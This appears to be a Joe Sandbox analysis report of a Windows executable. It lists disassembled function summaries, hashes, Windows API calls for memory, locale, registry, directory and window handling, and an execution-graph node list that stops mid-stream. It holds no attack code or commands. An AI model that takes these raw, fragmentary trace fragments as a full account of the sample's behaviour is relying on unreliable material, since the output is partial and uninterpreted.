                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
                                                                            • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                          • Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
                                                                          • Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                          • Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(004DFC60,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,004DFC60,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(004DED10,?,00000000,00008000,004DFC60,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@$%L
                                                                          • API String ID: 2123368496-90655549
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                          • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                          • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                          • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:16.6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:5.5%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:89
RtlEnterCriticalSection 48056->48058 48061 4020d0 48056->48061 48058->48061 48059 4020a1 48059->48056 48060 4020a5 48059->48060 48063 402106 48060->48063 48061->48063 48069 401f94 48061->48069 48063->48051 48065 4021f1 RtlLeaveCriticalSection 48066 4021fb 48065->48066 48066->48051 48067->48044 48068->48046 48072 401fa4 48069->48072 48070 401fd0 48074 401ff4 48070->48074 48081 401db4 48070->48081 48072->48070 48072->48074 48076 401f0c 48072->48076 48074->48065 48074->48066 48075->48059 48085 40178c 48076->48085 48080 401f29 48080->48072 48082 401dd2 48081->48082 48083 401e02 48081->48083 48082->48074 48083->48082 48108 401d1c 48083->48108 48089 4017a8 48085->48089 48086 4017b2 48104 401678 VirtualAlloc 48086->48104 48089->48086 48090 40180f 48089->48090 48093 401803 48089->48093 48096 4014e4 48089->48096 48105 4013e0 LocalAlloc 48089->48105 48090->48080 48095 401e80 9 API calls 48090->48095 48092 4017be 48092->48090 48106 4015c0 VirtualFree 48093->48106 48095->48080 48097 4014f3 VirtualAlloc 48096->48097 48099 401520 48097->48099 48100 401543 48097->48100 48107 401398 LocalAlloc 48099->48107 48100->48089 48102 40152c 48102->48100 48103 401530 VirtualFree 48102->48103 48103->48100 48104->48092 48105->48089 48106->48090 48107->48102 48109 401d2e 48108->48109 48110 401d51 48109->48110 48111 401d63 48109->48111 48121 401940 48110->48121 48113 401940 3 API calls 48111->48113 48114 401d61 48113->48114 48120 401d79 48114->48120 48131 401bf8 9 API calls 48114->48131 48116 401d88 48117 401da2 48116->48117 48132 401c4c 9 API calls 48116->48132 48133 401454 LocalAlloc 48117->48133 48120->48082 48122 401966 48121->48122 48123 4019bf 48121->48123 48134 40170c 48122->48134 48123->48114 48127 401983 48128 40199a 48127->48128 48139 4015c0 VirtualFree 48127->48139 48128->48123 48140 401454 LocalAlloc 48128->48140 48131->48116 48132->48117 48133->48120 48137 401743 48134->48137 48135 401783 48138 4013e0 LocalAlloc 48135->48138 48136 40175d VirtualFree 48136->48137 48137->48135 
48137->48136 48138->48127 48139->48128 48140->48123 48901 47b0a3 48902 47b0ac 48901->48902 48904 47b0d7 48901->48904 48902->48904 48905 47b0c9 48902->48905 48903 47b116 48907 47b136 48903->48907 48908 47b129 48903->48908 48904->48903 49280 479aa8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48904->49280 49278 471f48 162 API calls 48905->49278 48910 47b150 48907->48910 48911 47b13f 48907->48911 48913 47b12d 48908->48913 48914 47b16b 48908->48914 49283 479ce4 37 API calls 48910->49283 49282 479c74 37 API calls 48911->49282 48912 47b109 49281 479c74 37 API calls 48912->49281 48921 47b131 48913->48921 48925 47b1ae 48913->48925 48926 47b1c9 48913->48926 48918 47b174 48914->48918 48919 47b18f 48914->48919 48915 47b0ce 48915->48904 49279 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48915->49279 49284 479ce4 37 API calls 48918->49284 49285 479ce4 37 API calls 48919->49285 48929 47b1f2 48921->48929 48930 47b210 48921->48930 49286 479ce4 37 API calls 48925->49286 49287 479ce4 37 API calls 48926->49287 48931 47b207 48929->48931 49288 479c74 37 API calls 48929->49288 49290 479940 24 API calls 48930->49290 49289 479940 24 API calls 48931->49289 48935 47b20e 48936 47b226 48935->48936 48937 47b220 48935->48937 48938 47b224 48936->48938 48939 479c50 37 API calls 48936->48939 48937->48938 49017 479c50 48937->49017 49022 47722c 48938->49022 48939->48938 49351 4795d4 37 API calls 49017->49351 49019 479c6b 49352 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49019->49352 49353 42d774 GetWindowsDirectoryA 49022->49353 49024 47724a 49025 403450 4 API calls 49024->49025 49026 477257 49025->49026 49355 42d7a0 GetSystemDirectoryA 49026->49355 49028 47725f 49029 403450 4 API calls 49028->49029 49030 47726c 49029->49030 49357 42d7cc 49030->49357 49032 477274 49033 403450 4 API calls 49032->49033 49034 477281 49033->49034 49035 4772a6 49034->49035 49036 47728a 49034->49036 49037 403400 4 API calls 49035->49037 49413 42d0e4 49036->49413 49039 4772a4 
49037->49039 49042 4772eb 49039->49042 49043 42c7a8 5 API calls 49039->49043 49041 403450 4 API calls 49041->49039 49361 4770b4 49042->49361 49045 4772c6 49043->49045 49047 403450 4 API calls 49045->49047 49050 4772d3 49047->49050 49048 403450 4 API calls 49049 477307 49048->49049 49051 477325 49049->49051 49052 4035c0 4 API calls 49049->49052 49050->49042 49054 403450 4 API calls 49050->49054 49053 4770b4 8 API calls 49051->49053 49052->49051 49055 477334 49053->49055 49054->49042 49056 403450 4 API calls 49055->49056 49057 477341 49056->49057 49058 477369 49057->49058 49059 42c36c 5 API calls 49057->49059 49060 4773d0 49058->49060 49064 4770b4 8 API calls 49058->49064 49061 477357 49059->49061 49062 4773fa 49060->49062 49063 4773d9 49060->49063 49066 4035c0 4 API calls 49061->49066 49372 42c36c 49062->49372 49067 42c36c 5 API calls 49063->49067 49068 477381 49064->49068 49066->49058 49071 4773e6 49067->49071 49069 403450 4 API calls 49068->49069 49072 47738e 49069->49072 49070 477407 49382 4035c0 49070->49382 49074 4035c0 4 API calls 49071->49074 49076 4773a1 49072->49076 49421 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49072->49421 49075 4773f8 49074->49075 49404 477198 49075->49404 49078 4770b4 8 API calls 49076->49078 49080 4773b0 49078->49080 49082 403450 4 API calls 49080->49082 49084 4773bd 49082->49084 49083 403400 4 API calls 49085 477433 49083->49085 49084->49060 49422 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49084->49422 49087 477688 49085->49087 49088 477690 49087->49088 49088->49088 49448 4523a8 49088->49448 49091 403450 4 API calls 49092 4776bd 49091->49092 49093 403494 4 API calls 49092->49093 49094 4776ca 49093->49094 49466 40357c 49094->49466 49096 4776d8 49097 455bc8 24 API calls 49096->49097 49098 4776e0 49097->49098 49099 4776f3 49098->49099 49496 4553bc 6 API calls 49098->49496 49101 42c36c 5 API calls 49099->49101 49102 477700 49101->49102 49103 4035c0 4 API calls 49102->49103 49104 477710 49103->49104 49105 47771a 
CreateDirectoryA 49104->49105 49106 477780 49105->49106 49107 477724 GetLastError 49105->49107 49108 4035c0 4 API calls 49106->49108 49109 4508e0 4 API calls 49107->49109 49110 477795 49108->49110 49111 47773c 49109->49111 49480 477630 49110->49480 49497 406cd0 19 API calls 49111->49497 49115 47774c 49117 42e670 5 API calls 49115->49117 49119 47775c 49117->49119 49498 4508b0 49119->49498 49278->48915 49280->48912 49281->48903 49282->48921 49283->48921 49284->48921 49285->48921 49286->48921 49287->48921 49288->48931 49289->48935 49290->48935 49351->49019 49354 42d795 49353->49354 49354->49024 49356 42d7c1 49355->49356 49356->49028 49358 403400 4 API calls 49357->49358 49359 42d7dc GetModuleHandleA GetProcAddress 49358->49359 49360 42d7f5 49359->49360 49360->49032 49423 42dc54 49361->49423 49363 4770da 49364 477100 49363->49364 49365 4770de 49363->49365 49367 403400 4 API calls 49364->49367 49426 42db84 49365->49426 49369 477107 49367->49369 49369->49048 49370 4770f5 RegCloseKey 49370->49369 49371 403400 4 API calls 49371->49370 49373 42c376 49372->49373 49374 42c399 49372->49374 49446 42c858 CharPrevA 49373->49446 49375 403494 4 API calls 49374->49375 49377 42c3a2 49375->49377 49377->49070 49378 42c37d 49378->49374 49379 42c388 49378->49379 49380 4035c0 4 API calls 49379->49380 49381 42c396 49380->49381 49381->49070 49383 4035c4 49382->49383 49391 40357c 49382->49391 49384 403450 49383->49384 49385 4035e2 49383->49385 49386 4035d4 49383->49386 49383->49391 49388 4034bc 4 API calls 49384->49388 49393 403464 49384->49393 49390 4034bc 4 API calls 49385->49390 49389 403450 4 API calls 49386->49389 49387 403490 49387->49075 49388->49393 49389->49391 49401 4035f5 49390->49401 49391->49384 49392 4035bf 49391->49392 49394 40358a 49391->49394 49392->49075 49393->49387 49395 402660 4 API calls 49393->49395 49396 4035b4 49394->49396 49397 40359d 49394->49397 49395->49387 49399 4038a4 4 API calls 49396->49399 49398 4038a4 4 API calls 49397->49398 49400 4035a2 49398->49400 
49399->49400 49400->49075 49402 403450 4 API calls 49401->49402 49403 403621 49402->49403 49403->49075 49405 4771a6 49404->49405 49406 42dc54 RegOpenKeyExA 49405->49406 49407 4771ce 49406->49407 49408 4771ff 49407->49408 49409 42db84 6 API calls 49407->49409 49408->49083 49410 4771e4 49409->49410 49411 42db84 6 API calls 49410->49411 49412 4771f6 RegCloseKey 49411->49412 49412->49408 49414 4038a4 4 API calls 49413->49414 49416 42d0f7 49414->49416 49415 42d10e GetEnvironmentVariableA 49415->49416 49417 42d11a 49415->49417 49416->49415 49420 42d121 49416->49420 49447 42da08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49416->49447 49418 403400 4 API calls 49417->49418 49418->49420 49420->49041 49421->49076 49422->49060 49424 42dc65 RegOpenKeyExA 49423->49424 49425 42dc5f 49423->49425 49424->49363 49425->49424 49429 42da38 49426->49429 49430 42da5e RegQueryValueExA 49429->49430 49431 42daa3 49430->49431 49437 42da81 49430->49437 49432 403400 4 API calls 49431->49432 49434 42db6f 49432->49434 49433 42da9b 49435 403400 4 API calls 49433->49435 49434->49370 49434->49371 49435->49431 49436 4034e0 4 API calls 49436->49437 49437->49431 49437->49433 49437->49436 49438 403744 4 API calls 49437->49438 49439 42dad8 RegQueryValueExA 49438->49439 49439->49430 49440 42daf4 49439->49440 49440->49431 49441 4038a4 4 API calls 49440->49441 49442 42db36 49441->49442 49443 42db48 49442->49443 49445 403744 4 API calls 49442->49445 49444 403450 4 API calls 49443->49444 49444->49431 49445->49443 49446->49378 49447->49416 49451 4523c8 49448->49451 49452 4523ed CreateDirectoryA 49451->49452 49457 4508e0 4 API calls 49451->49457 49463 42e670 5 API calls 49451->49463 49464 4508b0 4 API calls 49451->49464 49504 42d850 49451->49504 49527 452134 49451->49527 49546 406cd0 19 API calls 49451->49546 49547 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49451->49547 49453 452465 49452->49453 49454 4523f7 GetLastError 49452->49454 49455 403494 4 API calls 49453->49455 49454->49451 49456 45246f 
49455->49456 49458 403420 4 API calls 49456->49458 49457->49451 49459 452489 49458->49459 49461 403420 4 API calls 49459->49461 49462 452496 49461->49462 49462->49091 49463->49451 49464->49451 49467 403580 49466->49467 49468 4035bf 49466->49468 49469 403450 49467->49469 49470 40358a 49467->49470 49468->49096 49476 4034bc 4 API calls 49469->49476 49477 403464 49469->49477 49471 4035b4 49470->49471 49472 40359d 49470->49472 49474 4038a4 4 API calls 49471->49474 49473 4038a4 4 API calls 49472->49473 49479 4035a2 49473->49479 49474->49479 49475 403490 49475->49096 49476->49477 49477->49475 49478 402660 4 API calls 49477->49478 49478->49475 49479->49096 49598 40d0ac 49480->49598 49496->49099 49497->49115 49499 4508d0 49498->49499 49649 450788 49499->49649 49505 42d0e4 5 API calls 49504->49505 49506 42d876 49505->49506 49507 42d882 49506->49507 49548 42cc24 49506->49548 49509 42d0e4 5 API calls 49507->49509 49510 42d8ce 49507->49510 49512 42d892 49509->49512 49513 42c6e0 5 API calls 49510->49513 49511 42d89e 49511->49510 49515 42d8c3 49511->49515 49518 42d0e4 5 API calls 49511->49518 49512->49511 49514 42cc24 7 API calls 49512->49514 49517 42d8d8 49513->49517 49514->49511 49515->49510 49516 42d774 GetWindowsDirectoryA 49515->49516 49516->49510 49519 42c36c 5 API calls 49517->49519 49520 42d8b7 49518->49520 49521 42d8e3 49519->49521 49520->49515 49523 42cc24 7 API calls 49520->49523 49522 403494 4 API calls 49521->49522 49524 42d8ed 49522->49524 49523->49515 49525 403420 4 API calls 49524->49525 49526 42d907 49525->49526 49526->49451 49528 452154 49527->49528 49529 42c36c 5 API calls 49528->49529 49530 45216d 49529->49530 49531 403494 4 API calls 49530->49531 49532 452178 49531->49532 49533 42ca9c 6 API calls 49532->49533 49535 4508e0 4 API calls 49532->49535 49539 4521f4 49532->49539 49568 4520c0 49532->49568 49576 403634 49532->49576 49582 451374 49532->49582 49590 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49532->49590 49533->49532 49535->49532 49540 403494 
4 API calls 49539->49540 49541 4521ff 49540->49541 49542 403420 4 API calls 49541->49542 49543 452219 49542->49543 49544 403400 4 API calls 49543->49544 49545 452221 49544->49545 49545->49451 49546->49451 49547->49451 49551 42cba8 49548->49551 49557 42ca9c 49551->49557 49553 42cbca 49554 42cbd2 GetFileAttributesA 49553->49554 49555 403400 4 API calls 49554->49555 49556 42cbef 49555->49556 49556->49507 49558 42c59c IsDBCSLeadByte 49557->49558 49559 42caad 49558->49559 49561 42cad4 49559->49561 49567 42ca20 CharPrevA 49559->49567 49562 42caea 49561->49562 49563 42cadf 49561->49563 49565 403778 4 API calls 49562->49565 49564 403494 4 API calls 49563->49564 49566 42cae8 49564->49566 49565->49566 49566->49553 49567->49559 49569 403400 4 API calls 49568->49569 49570 4520e1 49569->49570 49571 403510 4 API calls 49570->49571 49573 45210e 49570->49573 49591 403800 49570->49591 49571->49570 49574 403400 4 API calls 49573->49574 49575 452123 49574->49575 49575->49532 49577 40363c 49576->49577 49578 4034bc 4 API calls 49577->49578 49579 40364f 49578->49579 49580 403450 4 API calls 49579->49580 49581 403677 49580->49581 49583 4510a8 2 API calls 49582->49583 49584 45138a 49583->49584 49585 45138e 49584->49585 49595 42cc38 49584->49595 49585->49532 49588 4510e4 Wow64RevertWow64FsRedirection 49589 4513c9 49588->49589 49589->49532 49590->49532 49592 403804 49591->49592 49594 40382f 49591->49594 49593 4038a4 4 API calls 49592->49593 49593->49594 49594->49570 49596 42cba8 7 API calls 49595->49596 49597 42cc42 GetLastError 49596->49597 49597->49588 49599 40d0b6 49598->49599 49609 40d170 FindResourceA 49599->49609 49601 40d0e4 49602 477554 49601->49602 49621 40cf00 49602->49621 49610 40d195 49609->49610 49611 40d19c LoadResource 49609->49611 49619 40d0fc 19 API calls 49610->49619 49613 40d1b6 SizeofResource LockResource 49611->49613 49614 40d1af 49611->49614 49617 40d1d4 49613->49617 49620 40d0fc 19 API calls 49614->49620 49615 40d19b 49615->49611 49617->49601 49618 40d1b5 49618->49613 
49619->49615 49620->49618 49650 403400 4 API calls 49649->49650 49658 4507b9 49650->49658 51486 48c62c 51487 48c660 51486->51487 51488 48c662 51487->51488 51489 48c676 51487->51489 51622 446830 18 API calls 51488->51622 51492 48c6b2 51489->51492 51493 48c685 51489->51493 51491 48c66b Sleep 51610 48c6ad 51491->51610 51498 48c6ee 51492->51498 51499 48c6c1 51492->51499 51495 44688c 18 API calls 51493->51495 51494 403420 4 API calls 51496 48cb20 51494->51496 51497 48c694 51495->51497 51501 48c69c FindWindowA 51497->51501 51504 48c6fd 51498->51504 51505 48c744 51498->51505 51500 44688c 18 API calls 51499->51500 51503 48c6ce 51500->51503 51502 446b0c 5 API calls 51501->51502 51502->51610 51507 48c6d6 FindWindowA 51503->51507 51623 446830 18 API calls 51504->51623 51511 48c7a0 51505->51511 51512 48c753 51505->51512 51509 446b0c 5 API calls 51507->51509 51508 48c709 51624 446830 18 API calls 51508->51624 51619 48c6e9 51509->51619 51519 48c7fc 51511->51519 51520 48c7af 51511->51520 51627 446830 18 API calls 51512->51627 51513 48c716 51625 446830 18 API calls 51513->51625 51516 48c75f 51628 446830 18 API calls 51516->51628 51518 48c723 51626 446830 18 API calls 51518->51626 51529 48c80b 51519->51529 51530 48c836 51519->51530 51632 446830 18 API calls 51520->51632 51521 48c76c 51629 446830 18 API calls 51521->51629 51525 48c72e SendMessageA 51528 446b0c 5 API calls 51525->51528 51526 48c7bb 51633 446830 18 API calls 51526->51633 51527 48c779 51630 446830 18 API calls 51527->51630 51528->51619 51533 44688c 18 API calls 51529->51533 51539 48c884 51530->51539 51540 48c845 51530->51540 51537 48c818 51533->51537 51534 48c7c8 51634 446830 18 API calls 51534->51634 51536 48c784 PostMessageA 51631 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51536->51631 51544 48c820 RegisterClipboardFormatA 51537->51544 51538 48c7d5 51635 446830 18 API calls 51538->51635 51550 48c8d8 51539->51550 51551 48c893 51539->51551 51637 446830 18 API calls 51540->51637 51547 446b0c 5 
